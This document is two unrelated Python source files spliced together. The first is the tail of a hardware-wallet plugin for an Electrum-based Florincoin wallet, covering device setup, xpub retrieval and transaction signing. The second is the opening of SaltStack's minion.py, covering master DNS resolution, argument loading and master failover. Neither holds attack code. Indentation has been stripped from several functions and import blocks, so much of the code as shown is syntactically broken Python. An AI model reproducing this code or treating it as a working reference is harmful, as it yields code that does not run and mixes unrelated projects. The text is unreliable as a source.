        Returns the client, or None if the device cannot be used.
        """
        transport = self._try_hid(device)
        if not transport:
            self.print_error("cannot connect to device")
            return
        self.print_error("connected to device at", device.path)
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            if handler:
                handler.show_error(msg)
            else:
                raise UserFacingException(msg)
            return None
        return client
    def get_client(self, keystore, force_pair=True):
        """Return (and mark used) the client paired with *keystore*."""
        devmgr = self.device_manager()
        handler = keystore.handler
        # Serialize HID access across threads.
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Florincoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Thread body: run _initialize_device and report the result.

        Always exits the wizard's event loop with 0 on success, 1 on
        cancellation or error.
        """
        exit_code = 0
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            exit_code = 1
        except BaseException as e:
            traceback.print_exc(file=sys.stderr)
            handler.show_error(str(e))
            exit_code = 1
        finally:
            wizard.loop.exit(exit_code)
    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Dispatch the chosen TIM_* initialization method to the device."""
        item, label, pin_protection, passphrase_protection = settings
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
    def setup_device(self, device_info, wizard, purpose):
        """Prepare the device for use, initializing it first if needed.

        Raises UserFacingException when no client could be created for the
        device (e.g. it is in the wrong state). Ends by requesting an xpub,
        which forces the device to be unlocked/responsive.
        """
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        if client is None:
            raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
                                      _('Make sure it is in the correct state.'))
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        # Probe the device: fetching an xpub verifies it is usable.
        client.get_xpub('m', 'standard')
        client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign *tx* on the hardware device and merge the signatures back in.

        prev_tx: map of prevout hash -> previous transaction; the device
        library fetches these via get_tx to verify input amounts.
        xpub_path: map of xpub -> derivation path, used by tx_inputs to
        locate which keys belong to this keystore.
        """
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True)
        outputs = self.tx_outputs(keystore.get_derivation(), tx)
        signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
                                    lock_time=tx.locktime, version=tx.version)[0]
        # Append SIGHASH_ALL (0x01) to each hex-encoded signature, as
        # expected by Electrum's update_signatures.
        signatures = [(bh2u(x) + '01') for x in signatures]
        tx.update_signatures(signatures)
    def show_address(self, wallet, address, keystore=None):
        """Display *address* on the device screen for user verification.

        For multisig wallets the full redeem script description is sent so
        the device can derive and show the same address.
        """
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        client = self.get_client(keystore)
        if not client.atleast_version(1, 3):
            keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) == 1:
            # single-sig: the derivation path alone identifies the address
            script_type = self.get_keepkey_input_script_type(wallet.txin_type)
            client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
        else:
            def f(xpub):
                return self._make_node_path(xpub, [change, index])
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
            pubkeys = list(map(f, sorted_xpubs))
            multisig = self.types.MultisigRedeemScriptType(
                pubkeys=pubkeys,
                signatures=[b''] * wallet.n,
                m=wallet.m,
            )
            script_type = self.get_keepkey_input_script_type(wallet.txin_type)
            client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
    def tx_inputs(self, tx, for_sig=False):
        """Convert Electrum tx inputs into a list of device TxInputType objects.

        for_sig=True adds key-derivation / multisig metadata needed when the
        device is signing; with the default False only the bare prevout data
        is filled in (used when serializing previous transactions).
        """
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = b"\x00"*32
                prev_index = 0xffffffff # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # single-sig input: address_n tells the device which key to use
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype.address_n.extend(xpub_n + s)
                        txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
                    else:
                        def f(x_pubkey):
                            xpub, s = parse_xpubkey(x_pubkey)
                            return self._make_node_path(xpub, s)
                        pubkeys = list(map(f, x_pubkeys))
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
                            m=txin.get('num_sig'),
                        )
                        script_type = self.get_keepkey_input_script_type(txin['type'])
                        # rebuild the TxInputType with the multisig description attached
                        txinputtype = self.types.TxInputType(
                            script_type=script_type,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype.address_n.extend(xpub_n + s)
                                    break
                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if txin.get('scriptSig') is not None:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig
            # default sequence enables RBF-compatible nSequence (0xfffffffe)
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs
    def tx_outputs(self, derivation, tx):
        """Convert Electrum tx outputs into a list of device TxOutputType objects.

        At most one output (the change output, by preference) is described by
        its derivation path so the device can hide it from the confirmation
        screen; all other outputs are sent as plain addresses/scripts.
        NOTE: the two nested helpers read ``info``/``index``/``xpubs``/``m``/
        ``amount``/``_type``/``address``/``o`` from the enclosing loop scope.
        """
        def create_output_by_derivation():
            # output owned by this wallet: describe it by derivation path
            script_type = self.get_keepkey_output_script_type(info.script_type)
            if len(xpubs) == 1:
                address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
                txoutputtype = self.types.TxOutputType(
                    amount=amount,
                    script_type=script_type,
                    address_n=address_n,
                )
            else:
                address_n = self.client_class.expand_path("/%d/%d" % index)
                pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
                multisig = self.types.MultisigRedeemScriptType(
                    pubkeys=pubkeys,
                    signatures=[b''] * len(pubkeys),
                    m=m)
                txoutputtype = self.types.TxOutputType(
                    multisig=multisig,
                    amount=amount,
                    address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                    script_type=script_type)
            return txoutputtype
        def create_output_by_address():
            # external output: plain address, or OP_RETURN payload
            txoutputtype = self.types.TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = self.types.PAYTOOPRETURN
                txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
            elif _type == TYPE_ADDRESS:
                txoutputtype.script_type = self.types.PAYTOADDRESS
                txoutputtype.address = address
            return txoutputtype
        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
        for o in tx.outputs():
            _type, address, amount = o.type, o.address, o.value
            use_create_by_derivation = False
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
                on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                if on_change_branch == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True
            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation()
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)
        return outputs
    def electrum_tx_to_txtype(self, tx):
        """Convert a raw Electrum transaction into a device TransactionType.

        Returns an empty TransactionType when *tx* is None (segwit inputs
        don't require the full previous transaction).
        """
        t = self.types.TransactionType()
        if tx is None:
            # probably for segwit input and we don't need this prev txn
            return t
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t.inputs.extend(inputs)
        for vout in d['outputs']:
            # bin_outputs carry the raw amount/scriptPubKey pairs
            o = t.bin_outputs.add()
            o.amount = vout['value']
            o.script_pubkey = bfh(vout['scriptPubKey'])
        return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import os
import re
import sys
import copy
import time
import types
import signal
import random
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
    '''
    Resolves the master_ip and master_uri options

    Returns a dict that may contain: master_ip, master_uri, source_ip,
    source_ret_port, source_publish_port. With fallback=True an unresolvable
    master falls back to 127.0.0.1 instead of raising SaltClientError.
    Raises SaltSystemExit (code 42) when the master address is empty/invalid.
    '''
    ret = {}
    check_dns = True
    # masterless minions (local file_client) skip DNS resolution entirely
    if (opts.get('file_client', 'remote') == 'local' and
            not opts.get('use_master_when_local', False)):
        check_dns = False
    # Since salt.log is imported below, salt.utils.network needs to be imported here as well
    import salt.utils.network
    if check_dns is True:
        try:
            if opts['master'] == '':
                raise SaltSystemExit
            ret['master_ip'] = salt.utils.network.dns_check(
                opts['master'],
                int(opts['master_port']),
                True,
                opts['ipv6'])
        except SaltClientError:
            if opts['retry_dns']:
                # retry forever at retry_dns-second intervals until it resolves
                while True:
                    import salt.log
                    msg = ('Master hostname: \'{0}\' not found or not responsive. '
                           'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
                    if salt.log.setup.is_console_configured():
                        log.error(msg)
                    else:
                        print('WARNING: {0}'.format(msg))
                    time.sleep(opts['retry_dns'])
                    try:
                        ret['master_ip'] = salt.utils.network.dns_check(
                            opts['master'],
                            int(opts['master_port']),
                            True,
                            opts['ipv6'])
                        break
                    except SaltClientError:
                        pass
            else:
                if fallback:
                    ret['master_ip'] = '127.0.0.1'
                else:
                    raise
        except SaltSystemExit:
            unknown_str = 'unknown address'
            master = opts.get('master', unknown_str)
            if master == '':
                master = unknown_str
            if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
                      'Set \'syndic_master\' value in minion config.'.format(master)
            else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
                      'Set \'master\' value in minion config.'.format(master)
            log.error(err)
            raise SaltSystemExit(code=42, msg=err)
    else:
        ret['master_ip'] = '127.0.0.1'
    if 'master_ip' in ret and 'master_ip' in opts:
        if ret['master_ip'] != opts['master_ip']:
            log.warning(
                'Master ip address changed from %s to %s',
                opts['master_ip'], ret['master_ip']
            )
    # Optionally pin the outgoing connection to a configured interface/address
    if opts['source_interface_name']:
        log.trace('Custom source interface required: %s', opts['source_interface_name'])
        interfaces = salt.utils.network.interfaces()
        log.trace('The following interfaces are available on this Minion:')
        log.trace(interfaces)
        if opts['source_interface_name'] in interfaces:
            if interfaces[opts['source_interface_name']]['up']:
                # first configured address of the interface (inet or inet6)
                addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
                    interfaces[opts['source_interface_name']]['inet6']
                ret['source_ip'] = addrs[0]['address']
                log.debug('Using %s as source IP address', ret['source_ip'])
            else:
                log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
                            opts['source_interface_name'])
        else:
            log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
    elif opts['source_address']:
        ret['source_ip'] = salt.utils.network.dns_check(
            opts['source_address'],
            int(opts['source_ret_port']),
            True,
            opts['ipv6'])
        log.debug('Using %s as source IP address', ret['source_ip'])
    if opts['source_ret_port']:
        ret['source_ret_port'] = int(opts['source_ret_port'])
        log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
    if opts['source_publish_port']:
        ret['source_publish_port'] = int(opts['source_publish_port'])
        log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
    ret['master_uri'] = 'tcp://{ip}:{port}'.format(
        ip=ret['master_ip'], port=opts['master_port'])
    log.debug('Master URI: %s', ret['master_uri'])
    return ret
def prep_ip_port(opts):
    '''
    Parse the configured ``master`` value into a host and optional port.

    Returns a dict carrying ``master`` and, when a port was embedded in
    the master string, ``master_port`` as an int.
    '''
    # Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
    # a port specified. The is_ipv6 check returns False if brackets are used in the IP
    # definition such as master: '[::1]:1234'.
    if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
        return {'master': opts['master']}
    host_and_port = opts['master'].rsplit(':', 1)
    if len(host_and_port) == 1:
        # e.g. master: mysaltmaster
        return {'master': host_and_port[0]}
    # e.g. master: localhost:1234
    # e.g. master: 127.0.0.1:1234
    # e.g. master: [::1]:1234
    # Strip off brackets for ipv6 support
    ret = {'master': host_and_port[0].strip('[]')}
    # Cast port back to an int! Otherwise a TypeError is thrown
    # on some of the socket calls elsewhere in the minion and utils code.
    ret['master_port'] = int(host_and_port[1])
    return ret
def get_proc_dir(cachedir, **kwargs):
    '''
    Given the cache directory, return the directory that process data is
    stored in, creating it if it doesn't exist.
    The following optional Keyword Arguments are handled:
    mode: which is anything os.makedir would accept as mode.
    uid: the uid to set, if not set, or it is None or -1 no changes are
         made. Same applies if the directory is already owned by this
         uid. Must be int. Works only on unix/unix like systems.
    gid: the gid to set, if not set, or it is None or -1 no changes are
         made. Same applies if the directory is already owned by this
         gid. Must be int. Works only on unix/unix like systems.
    '''
    proc_dir = os.path.join(cachedir, 'proc')
    requested_mode = kwargs.pop('mode', None)
    # normalize into keyword args for os.makedirs
    mode_kwargs = {} if requested_mode is None else {'mode': requested_mode}
    if not os.path.isdir(proc_dir):
        # proc_dir is not present, create it with mode settings
        os.makedirs(proc_dir, **mode_kwargs)
    dir_stat = os.stat(proc_dir)
    if mode_kwargs:
        # An explicit mode was requested; re-apply it if the existing
        # directory's permission bits differ.
        current_mode = S_IMODE(dir_stat.st_mode)
        if current_mode != mode_kwargs['mode']:
            os.chmod(proc_dir, (dir_stat.st_mode ^ current_mode) | mode_kwargs['mode'])
    if hasattr(os, 'chown'):
        # only on unix/unix like systems
        uid = kwargs.pop('uid', -1)
        gid = kwargs.pop('gid', -1)
        # if uid and gid are both -1 then go ahead with no changes at all
        ownership_differs = dir_stat.st_uid != uid or dir_stat.st_gid != gid
        if ownership_differs and any(i != -1 for i in (uid, gid)):
            os.chown(proc_dir, uid, gid)
    return proc_dir
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
    '''
    Detect the args and kwargs that need to be passed to a function call, and
    check them against what was passed.

    Returns a (_args, _kwargs) tuple. Kwargs that the function cannot accept
    are collected and, unless ignore_invalid is True, reported via
    salt.utils.args.invalid_kwargs (which raises). When *data* (the publish
    payload) is given and the function accepts **kwargs, each data item is
    injected as a ``__pub_<key>`` kwarg.
    '''
    argspec = salt.utils.args.get_function_argspec(func)
    _args = []
    _kwargs = {}
    invalid_kwargs = []
    for arg in args:
        if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
            # if the arg is a dict with __kwarg__ == True, then its a kwarg
            for key, val in six.iteritems(arg):
                if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs[key] = val
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}={1}'.format(key, val))
            continue
        else:
            # maybe the arg is a "key=value" string that parses to a kwarg
            string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1]  # pylint: disable=W0632
            if string_kwarg:
                if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs.update(string_kwarg)
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    for key, val in six.iteritems(string_kwarg):
                        invalid_kwargs.append('{0}={1}'.format(key, val))
            else:
                _args.append(arg)
    if invalid_kwargs and not ignore_invalid:
        salt.utils.args.invalid_kwargs(invalid_kwargs)
    if argspec.keywords and isinstance(data, dict):
        # this function accepts **kwargs, pack in the publish data
        for key, val in six.iteritems(data):
            _kwargs['__pub_{0}'.format(key)] = val
    return _args, _kwargs
def eval_master_func(opts):
    '''
    Evaluate master function if master type is 'func'
    and save it result in opts['master']

    opts['master'] must be a dotted "module.function" string; the module is
    loaded via salt.loader.raw_mod and its return value (a string or list)
    replaces opts['master']. Exits the process (EX_GENERIC) on load failure
    or an invalid return type. Idempotent: guarded by
    opts['__master_func_evaluated'].
    '''
    if '__master_func_evaluated' not in opts:
        # split module and function and try loading the module
        mod_fun = opts['master']
        mod, fun = mod_fun.split('.')
        try:
            master_mod = salt.loader.raw_mod(opts, mod, fun)
            if not master_mod:
                raise KeyError
            # we take whatever the module returns as master address
            opts['master'] = master_mod[mod_fun]()
            # Check for valid types
            if not isinstance(opts['master'], (six.string_types, list)):
                raise TypeError
            opts['__master_func_evaluated'] = True
        except KeyError:
            log.error('Failed to load module %s', mod_fun)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        except TypeError:
            log.error('%s returned from %s is not a string', opts['master'], mod_fun)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
    '''
    Centralized master event function which will return event type based on event_map
    '''
    tag_by_type = {
        'connected': '__master_connected',
        'disconnected': '__master_disconnected',
        'failback': '__master_failback',
        'alive': '__master_alive',
    }
    base_tag = tag_by_type.get(type, None)
    # 'alive' events are per-master: suffix the tag with the master id
    if type == 'alive' and master is not None:
        return '{0}_{1}'.format(base_tag, master)
    return base_tag
class MinionBase(object):
    '''
    Shared functionality for all minion flavours: scheduling helpers,
    beacon processing, SSDP master discovery and the master
    connection/failover logic (eval_master).
    '''
    def __init__(self, opts):
        # opts: the (mutable) minion configuration dictionary
        self.opts = opts
    @staticmethod
    def process_schedule(minion, loop_interval):
        '''
        Evaluate the minion's scheduler once and return the (possibly
        lowered) loop interval the main loop should use.
        '''
        try:
            if hasattr(minion, 'schedule'):
                minion.schedule.eval()
            else:
                log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
                return
            # Check if scheduler requires lower loop interval than
            # the loop_interval setting
            if minion.schedule.loop_interval < loop_interval:
                loop_interval = minion.schedule.loop_interval
                log.debug(
                    'Overriding loop_interval because of scheduled jobs.'
                )
        except Exception as exc:
            log.error('Exception %s occurred in scheduled job', exc)
        return loop_interval
    def process_beacons(self, functions):
        '''
        Evaluate all of the configured beacons, grab the config again in case
        the pillar or grains changed
        '''
        if 'config.merge' in functions:
            b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
            if b_conf:
                return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
        return []
    @tornado.gen.coroutine
    def eval_master(self,
                    opts,
                    timeout=60,
                    safe=True,
                    failed=False,
                    failback=False):
        '''
        Evaluates and returns a tuple of the current master address and the pub_channel.
        In standard mode, just creates a pub_channel with the given master address.
        With master_type=func evaluates the current master address from the given
        module and then creates a pub_channel.
        With master_type=failover takes the list of masters and loops through them.
        The first one that allows the minion to create a pub_channel is then
        returned. If this function is called outside the minions initialization
        phase (for example from the minions main event-loop when a master connection
        loss was detected), 'failed' should be set to True. The current
        (possibly failed) master will then be removed from the list of masters.
        '''
        # return early if we are not connecting to a master
        if opts['master_type'] == 'disable':
            log.warning('Master is set to disable, skipping connection')
            self.connected = False
            raise tornado.gen.Return((None, None))
        # Run masters discovery over SSDP. This may modify the whole configuration,
        # depending of the networking and sets of masters.
        self._discover_masters()
        # check if master_type was altered from its default
        if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
            # check for a valid keyword
            if opts['master_type'] == 'func':
                eval_master_func(opts)
            # if failover or distributed is set, master has to be of type list
            elif opts['master_type'] in ('failover', 'distributed'):
                if isinstance(opts['master'], list):
                    log.info(
                        'Got list of available master addresses: %s',
                        opts['master']
                    )
                    if opts['master_type'] == 'distributed':
                        master_len = len(opts['master'])
                        if master_len > 1:
                            secondary_masters = opts['master'][1:]
                            # NOTE(review): binascii.crc32 requires bytes in
                            # Python 3; a str minion id would raise TypeError,
                            # which is swallowed by the except below — confirm.
                            master_idx = crc32(opts['id']) % master_len
                            try:
                                # put the deterministically chosen master first,
                                # keep the rest in their original order
                                preferred_masters = opts['master']
                                preferred_masters[0] = opts['master'][master_idx]
                                preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
                                opts['master'] = preferred_masters
                                log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
                            except (KeyError, AttributeError, TypeError):
                                log.warning('Failed to distribute to a specific master.')
                        else:
                            log.warning('master_type = distributed needs more than 1 master.')
                    if opts['master_shuffle']:
                        if opts['master_failback']:
                            # keep the primary master first, shuffle the rest
                            secondary_masters = opts['master'][1:]
                            shuffle(secondary_masters)
                            opts['master'][1:] = secondary_masters
                        else:
                            shuffle(opts['master'])
                    opts['auth_tries'] = 0
                    if opts['master_failback'] and opts['master_failback_interval'] == 0:
                        opts['master_failback_interval'] = opts['master_alive_interval']
                # if opts['master'] is a str and we have never created opts['master_list']
                elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
                    # We have a string, but a list was what was intended. Convert.
                    # See issue 23611 for details
                    opts['master'] = [opts['master']]
                elif opts['__role'] == 'syndic':
                    log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
                # if failed=True, the minion was previously connected
                # we're probably called from the minions main-event-loop
                # because a master connection loss was detected. remove
                # the possibly failed master from the list of masters.
                elif failed:
                    if failback:
                        # failback list of masters to original config
                        opts['master'] = opts['master_list']
                    else:
                        log.info(
                            'Moving possibly failed master %s to the end of '
                            'the list of masters', opts['master']
                        )
                        if opts['master'] in opts['local_masters']:
                            # create new list of master with the possibly failed
                            # one moved to the end
                            failed_master = opts['master']
                            opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
                            opts['master'].append(failed_master)
                        else:
                            opts['master'] = opts['master_list']
                else:
                    msg = ('master_type set to \'failover\' but \'master\' '
                           'is not of type list but of type '
                           '{0}'.format(type(opts['master'])))
                    log.error(msg)
                    sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
                # See issue 21082 for details
                if opts['retry_dns'] and opts['master_type'] == 'failover':
                    msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
                           'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
                    log.critical(msg)
                    opts['retry_dns'] = 0
            else:
                msg = ('Invalid keyword \'{0}\' for variable '
                       '\'master_type\''.format(opts['master_type']))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        # FIXME: if SMinion don't define io_loop, it can't switch master see #29088
        # Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
        # (The channel factories will set a default if the kwarg isn't passed)
